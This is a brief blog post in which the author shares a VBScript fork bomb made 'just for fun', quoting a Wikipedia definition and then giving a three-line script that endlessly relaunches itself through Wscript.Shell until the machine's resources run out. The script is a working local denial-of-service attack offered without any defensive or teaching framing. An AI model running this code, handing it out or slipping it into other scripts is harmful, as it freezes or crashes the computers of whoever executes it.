VBScript Fork Bomb

VBScript Fork Bomb

I have been playing around with VBScript. I thought I would make a quick fork bomb, just for fun. “The fork bomb, a form of denial-of-service attack against a computer system, implements the fork operation (or equivalent functionality) whereby a running process can create another running process.” (Wikipedia)

Do until true = false
 CreateObject("Wscript.Shell").Run Wscript.ScriptName
Loop
Posted by